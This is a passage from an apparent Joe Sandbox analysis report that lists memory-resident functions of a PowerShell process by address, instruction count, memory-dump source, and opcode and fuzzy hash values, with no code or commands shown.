                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c08fe7db6a05bcb8e5fa4b435db669edb68309b0052176671b948fcaf27cdbeb
                                                                                      • Instruction ID: 04650a5d6f54a890f289e74ff84b3565b25f86ff9ff8f0b3e494fd2275d01c56
                                                                                      • Opcode Fuzzy Hash: c08fe7db6a05bcb8e5fa4b435db669edb68309b0052176671b948fcaf27cdbeb
                                                                                      • Instruction Fuzzy Hash: 16F0E570E0A24CAFCB90DFA8D5515ACBFB4AB45300F1080EAD84867382C631AE01DF40
                                                                                      Function 06F64988 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c67d0ed7e88820d0ef68c75ced565432a472940489656d9f45139da944d9fc9
                                                                                      • Instruction ID: c18bf08d8b6b9e97410faee63d65c941d70ee04ca6b9b76752a19df6274cf816
                                                                                      • Opcode Fuzzy Hash: 2c67d0ed7e88820d0ef68c75ced565432a472940489656d9f45139da944d9fc9
                                                                                      • Instruction Fuzzy Hash: 2CE06D70E492489FC790EBA8C954668BBF49B0A204F2481EAD889D7781E6329A41CB85
                                                                                      Function 06F64908 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf4ed5c04e842e4dbda2627ceabcd6a6c5244e85875dc9b1030b36d1e1aa4dac
                                                                                      • Instruction ID: 753af05725b8b64b1edd80ba212d5c6684a274ea7cd279b70fff56b62de1f04a
                                                                                      • Opcode Fuzzy Hash: bf4ed5c04e842e4dbda2627ceabcd6a6c5244e85875dc9b1030b36d1e1aa4dac
                                                                                      • Instruction Fuzzy Hash: 4EE0DF70C0A2049FD395DA54DA007E6BBB89B06318F1480CEE4094B252C633DE42CB81
                                                                                      Function 06F66490 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2ead5803edff4c2178ee7c244bb2d9d0e9644bbba4db7bb8fd7907d9c8c2780
                                                                                      • Instruction ID: c8ab00c376a6090278c32cb05390e1af8b988ec844f2c9d4ce8f1f0b8910401e
                                                                                      • Opcode Fuzzy Hash: b2ead5803edff4c2178ee7c244bb2d9d0e9644bbba4db7bb8fd7907d9c8c2780
                                                                                      • Instruction Fuzzy Hash: 68E03239904108EBCF00DF94D9409ADBB75FB48310F20C099EC0422250C6729A62EB81
                                                                                      Function 06F64579 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 373b9fb95753a70df198d4398faf0ba03bb2a6545576a3c2247f88ed3bb834e5
                                                                                      • Instruction ID: 012287361395e48564e802bb3c1ced79e8cae1962b886317636f83ebbe1fe14d
                                                                                      • Opcode Fuzzy Hash: 373b9fb95753a70df198d4398faf0ba03bb2a6545576a3c2247f88ed3bb834e5
                                                                                      • Instruction Fuzzy Hash: 5DE0D871C091549FC394EBA9C5111ECBFF49B09210F1481DAEC5557351D6359E41CB91
                                                                                      Function 06F6B068 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 975983d115ef90d1ac7bafd1c71d7a1a628db219afb4d7c6ce8d44fcec84116e
                                                                                      • Instruction ID: 895608ffaf5989a0b2e68d554b7b2b57013fbd7aeadc877005ea98091d111888
                                                                                      • Opcode Fuzzy Hash: 975983d115ef90d1ac7bafd1c71d7a1a628db219afb4d7c6ce8d44fcec84116e
                                                                                      • Instruction Fuzzy Hash: A6E0C974D05108BFCB84DF99C5449ACBBB8AB48310F10C19AE85997341D6319B51DF90
                                                                                      Function 06F68F48 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9d57e22f4e7e00361121431a2da6095b9b6e9ab8313c5766bf8dc81b8850b82
                                                                                      • Instruction ID: 498048184b2d2f7b0404a9e26ba4bb904e756e9a0589cea5ece7a49ab63082a7
                                                                                      • Opcode Fuzzy Hash: d9d57e22f4e7e00361121431a2da6095b9b6e9ab8313c5766bf8dc81b8850b82
                                                                                      • Instruction Fuzzy Hash: B1F0C935D05208EFCB45DF99C9409ACBFB9EB48310F14C19EEC5466351D6369A51EF90
                                                                                      Function 06F48E18 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 018bf331269f00a4dd938f604d6ba863c163d6396503948fff612e7623c319ff
                                                                                      • Instruction ID: 3f200258ee020c7941133caf0f3f99628751e10be9d26883180b83d5f773e8b3
                                                                                      • Opcode Fuzzy Hash: 018bf331269f00a4dd938f604d6ba863c163d6396503948fff612e7623c319ff
                                                                                      • Instruction Fuzzy Hash: 9FE0C274E05208EFCB84EFA8C9806ACBBF4EB48314F10C0AAD81893340D635AA42DF80
                                                                                      Function 06F47DB0 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 018bf331269f00a4dd938f604d6ba863c163d6396503948fff612e7623c319ff
                                                                                      • Instruction ID: 9a88214064b090659d0b9f8e2a3875a8282085c132909de36c67f02774b61932
                                                                                      • Opcode Fuzzy Hash: 018bf331269f00a4dd938f604d6ba863c163d6396503948fff612e7623c319ff
                                                                                      • Instruction Fuzzy Hash: BBE01A74E19208EFCB84EFA8C5406ACFBF5EB48300F10C0AAD81993340D735AA42CF80
                                                                                      Function 06F6C698 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03604f242f74f48260a2d994eb65f1619103977800fbd09ccb23a938b799227e
                                                                                      • Instruction ID: f5b8164e5fdc4c9f3dd2f801d2c8089c361d074e54bb44e758323fb96b7d9c89
                                                                                      • Opcode Fuzzy Hash: 03604f242f74f48260a2d994eb65f1619103977800fbd09ccb23a938b799227e
                                                                                      • Instruction Fuzzy Hash: 87E01A74D05118EFC784DFA9C540AACFBF8EB4A300F10C0AAE88897341CA36AA51DF94
                                                                                      Function 06F69431 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4ae652f0e8be2210dfb7f81709889c67a3058e038972a9a8af4d9e8d2f0d008
                                                                                      • Instruction ID: 9bb82e521f77f25ec037710839d0ef59fb2376523ac47b0b8a4bc6db9cfafa5c
                                                                                      • Opcode Fuzzy Hash: b4ae652f0e8be2210dfb7f81709889c67a3058e038972a9a8af4d9e8d2f0d008
                                                                                      • Instruction Fuzzy Hash: 84F03930A042088FEB00CFA5C841BEDBBB2EF8C304F448059E449AB281DB719982CF50
                                                                                      Function 06F47360 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10dc40183051d5f85649b84f5e8871c8613c24efac3c48aa8143bd6dcc1682e4
                                                                                      • Instruction ID: a0230abf8f6a209505bf3b140a228de58fc8882cd783de541e3b0cb63b357020
                                                                                      • Opcode Fuzzy Hash: 10dc40183051d5f85649b84f5e8871c8613c24efac3c48aa8143bd6dcc1682e4
                                                                                      • Instruction Fuzzy Hash: 44E0BF74D15108DFC784FFA8D9456ACBBF4AB49214F1080A9DC4993351D7319A45CB41
                                                                                      Function 06F4E000 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fdac015faf5aad7a3f97d4dbdc39609d699af8412ad6c4a128471b7b118d7642
                                                                                      • Instruction ID: 7573000b2560ceb652f1a2dabac99ad118177b90ee2b4823f6d2c7955739a6b5
                                                                                      • Opcode Fuzzy Hash: fdac015faf5aad7a3f97d4dbdc39609d699af8412ad6c4a128471b7b118d7642
                                                                                      • Instruction Fuzzy Hash: CFD02E31B403049BEBF037A88C01B623BC8AF02750F1000E9EA259FAC0CEA2E841C3A0
                                                                                      Function 06F471AD Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f6372aeb5f97e535cb027ca39c5e5e0885c80fa9df11a8541b544776f601899
                                                                                      • Instruction ID: bcb3f7086382067b872af728371130e54d8896c373b24d0b2aae1bcd6ac37ac9
                                                                                      • Opcode Fuzzy Hash: 0f6372aeb5f97e535cb027ca39c5e5e0885c80fa9df11a8541b544776f601899
                                                                                      • Instruction Fuzzy Hash: 31F0D430E44159CFFB50DFA4D8447AD7AB5BB48705F8041A9D40AAB744DF345D429F51
                                                                                      Function 06D11240 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7dfffba6089880dd9d83367abfd5ce3bfb86077ad863c65e4f15092aa0dfe980
                                                                                      • Instruction ID: 6aba69bececabdac9aaa60b4a4dcf09be71337929b4d77b95d0476281dba0aeb
                                                                                      • Opcode Fuzzy Hash: 7dfffba6089880dd9d83367abfd5ce3bfb86077ad863c65e4f15092aa0dfe980
                                                                                      • Instruction Fuzzy Hash: 1BE08634905208EBCB54DF94D9819ACBB74EB8A314F10C099DD4457340C6729E52DF84
                                                                                      Function 06F6D6E0 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72583273e789eea499aeeb26b3dcbd844134a76feb89b4ff50df5199f7d79a90
                                                                                      • Instruction ID: 23531768c8ba1dbf632241442de0d28343e73b36cddd2986902d8f744680fad7
                                                                                      • Opcode Fuzzy Hash: 72583273e789eea499aeeb26b3dcbd844134a76feb89b4ff50df5199f7d79a90
                                                                                      • Instruction Fuzzy Hash: 52E0BF74E15108DFC784EFADC58569CBBF5AB49214F1084A9D80D93341D6329A55CF41
                                                                                      Function 06F6FE48 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33fca8842228fda1f7cb614f2c6cd2f73ae426555dec717d05739ea70169c7ff
                                                                                      • Instruction ID: e345b42afbd39e017c6cf4dc74287c8af085a227a1777b4957036bb915b9cd89
                                                                                      • Opcode Fuzzy Hash: 33fca8842228fda1f7cb614f2c6cd2f73ae426555dec717d05739ea70169c7ff
                                                                                      • Instruction Fuzzy Hash: D1E09A74D05208EFCB54DF99D5415ACBBB5EB48314F10C1A9D80957341DA31AA41DF85
                                                                                      Function 06F66DB4 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 145bd6bd6c009e0b4aa9ec9c64367e7567915d29fab54cb52350d2250a4862ae
                                                                                      • Instruction ID: d7360e69414412fe07d0a04585d84ffbc33e31c6ac215931d8ad509aedf81fed
                                                                                      • Opcode Fuzzy Hash: 145bd6bd6c009e0b4aa9ec9c64367e7567915d29fab54cb52350d2250a4862ae
                                                                                      • Instruction Fuzzy Hash: B8F0F83180065ADBDF119F50C810ADDB731FF48301F408645E95977210DB70AAD59F80
                                                                                      Function 06F46190 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4b0e87840ad5d82e86feba3ef06b53cb90866fff193bd2e842ae64deb2a8b74d
                                                                                      • Instruction ID: 8d11ed3088d32b78d211c40c01e8c13ad229b651a4b33b24d5f934fbb03d05e9
                                                                                      • Opcode Fuzzy Hash: 4b0e87840ad5d82e86feba3ef06b53cb90866fff193bd2e842ae64deb2a8b74d
                                                                                      • Instruction Fuzzy Hash: 8DE0EC70D56208DFDB90EFF8D54569CBFB8AB49601F1044AAD809D3241EA319A50DB41
                                                                                      Function 06D3F958 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5987686ef3c1ac13757e8f211c040b9340e316c94b1c0decb4cd7db03f212e84
                                                                                      • Instruction ID: 4ee044f80b4b5123a91188b68a608f9a7319a86868abe545a9d5b56b3aa4ff23
                                                                                      • Opcode Fuzzy Hash: 5987686ef3c1ac13757e8f211c040b9340e316c94b1c0decb4cd7db03f212e84
                                                                                      • Instruction Fuzzy Hash: 61E0C234D0920CEBC744DFA8D9409ACBBB8EB45300F10C09DC88817340CA32AE46CF90
                                                                                      Function 06F63EA8 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4cf01c93e7e86c2fba248a1ebda3dd492acb315fcf1886c1417f7b59613f8f0d
                                                                                      • Instruction ID: b21123eb0f0b28f50ac8c1ad9b7d15fcd9afbd644be1a50fe1800eddd7157da3
                                                                                      • Opcode Fuzzy Hash: 4cf01c93e7e86c2fba248a1ebda3dd492acb315fcf1886c1417f7b59613f8f0d
                                                                                      • Instruction Fuzzy Hash: FEE0C234D09108DBCB44EFA9D9409ACBBB8EB45300F10D0ADD80813340CB32AE46CF90
                                                                                      Function 06F65A35 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41e39696a1b4c46922f090ffea30dc331f9e59a00dff185dff1901f312ac012d
                                                                                      • Instruction ID: da1999a564fd2c13fc4b814985c35590d41eeee2cb702860c9bbd84b47ce0799
                                                                                      • Opcode Fuzzy Hash: 41e39696a1b4c46922f090ffea30dc331f9e59a00dff185dff1901f312ac012d
                                                                                      • Instruction Fuzzy Hash: F0E01231904208DFEF008FC4DC80A9D7B73BB4D319F808004F516AB298CB39A8469B90
                                                                                      Function 06F46E4E Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aef7510a1620cbe7ae0ec0d1a1f28d7dcc0483e333d8301a825b04cab9dcd700
                                                                                      • Instruction ID: 8100ce89f29fe3eae475c12e0819cd042766c8708c46220291ed9f6601fcc9a6
                                                                                      • Opcode Fuzzy Hash: aef7510a1620cbe7ae0ec0d1a1f28d7dcc0483e333d8301a825b04cab9dcd700
                                                                                      • Instruction Fuzzy Hash: FAE01A30A41214CFEF14EF60D894B9E7BB1EF8A70AF504099D80AAB344CF345D8A8F51
                                                                                      Function 06F6C983 Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0959d3eb025aab39518303641200667cd023aa5237e842df08c069ad7808b5a8
                                                                                      • Instruction ID: c7145488e08ea6f5e643333b559b6ae39a2574c51c3f46248f37b611f71cb385
                                                                                      • Opcode Fuzzy Hash: 0959d3eb025aab39518303641200667cd023aa5237e842df08c069ad7808b5a8
                                                                                      • Instruction Fuzzy Hash: D5E0B674E05258CFFB50DFA9D484B9DBBB1FB59708F608259E885A7744C6345881CF90
                                                                                      Function 06F43C0D Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ddeb3a3d1b4144ff80d75dedbba93adbda3357913c126102326e45675764a27
                                                                                      • Instruction ID: c31106a9005c3a79f572bdd9ae23224690e5b6049deef274f54c36fa0f56adfa
                                                                                      • Opcode Fuzzy Hash: 9ddeb3a3d1b4144ff80d75dedbba93adbda3357913c126102326e45675764a27
                                                                                      • Instruction Fuzzy Hash: 1AE0B670904258CFDBA59B24C9887D9BBB1AB41305F105095920962695CB741AC9CF42
                                                                                      Function 06F4ADD0 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 162f9c8cd78033f3bd7749a6abd6ebfc973492e6c8b01b847b821bc6d947a93b
                                                                                      • Instruction ID: 543e914e120e2b9b21680b9fd5393046d4478fceb7424aec736dd7f24bfe6251
                                                                                      • Opcode Fuzzy Hash: 162f9c8cd78033f3bd7749a6abd6ebfc973492e6c8b01b847b821bc6d947a93b
                                                                                      • Instruction Fuzzy Hash: 04C0122098A2C24FEB020B704C6B2C9FFB09F02711B0881E5C8868FED38480400B8BD1
                                                                                      Function 06D1972A Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 338bc796651798d816e5f2cd50b16ab9f97eee9aa9dc3e9ad6823f6ca4c80693
                                                                                      • Instruction ID: 41ef27226c58a2cfeefe683a15d10b9a125d571b3e60469b14eeb7667fd02426
                                                                                      • Opcode Fuzzy Hash: 338bc796651798d816e5f2cd50b16ab9f97eee9aa9dc3e9ad6823f6ca4c80693
                                                                                      • Instruction Fuzzy Hash: 93D06CB8A10328DFDB50DFA4E895B89BBB9BB09304F005196E45AA3790DB305981CF91
                                                                                      Function 06D19DE9 Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23fafb2b47545abd6cc57e26dca81d61a6642e4383936bd19af220baac0172cd
                                                                                      • Instruction ID: 746016191c738103762bd6cc8407111de534c2903a50945bc0a0a47886d40326
                                                                                      • Opcode Fuzzy Hash: 23fafb2b47545abd6cc57e26dca81d61a6642e4383936bd19af220baac0172cd
                                                                                      • Instruction Fuzzy Hash: A8C00276E5001A9A8B00DAD9E8508DCB774EB94322B004026D215A6104D63015268B50

                                                                                      Non-executed Functions

                                                                                      Function 06D39C99 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: djq
                                                                                      • API String ID: 0-3097775593
                                                                                      • Opcode ID: b556b546b840de494c73e572070c387527054f7c2fa3fbc05c7c5cfae6dbe683
                                                                                      • Instruction ID: ec3f03282c23dde3bdc3d63bac888ee7215c882e9b93b00ed41094be6f78705a
                                                                                      • Opcode Fuzzy Hash: b556b546b840de494c73e572070c387527054f7c2fa3fbc05c7c5cfae6dbe683
                                                                                      • Instruction Fuzzy Hash: 72816974E00218CFEB50DFA9D895B9DBBF2FB89300F508169E449AB355EB745986CF40
                                                                                      Function 06D39CA8 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: djq
                                                                                      • API String ID: 0-3097775593
                                                                                      • Opcode ID: cfeaaf7251767c8f73339a9a17f43e57c10e59365e13d45e530ce2a828952eae
                                                                                      • Instruction ID: 3e66f32323220a40a29a4d90949030051633af756d919ac789a526122c313684
                                                                                      • Opcode Fuzzy Hash: cfeaaf7251767c8f73339a9a17f43e57c10e59365e13d45e530ce2a828952eae
                                                                                      • Instruction Fuzzy Hash: C0813974E04228CFEB54DFA9D895BADBBF2FB89300F508029D449AB354EB745985CF40
                                                                                      Function 06D3CA30 Relevance: .2, Instructions: 216COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf796fdbbdbfc667575a69b7b369dcd02949a82d22aa076ce0979e44dfcf4219
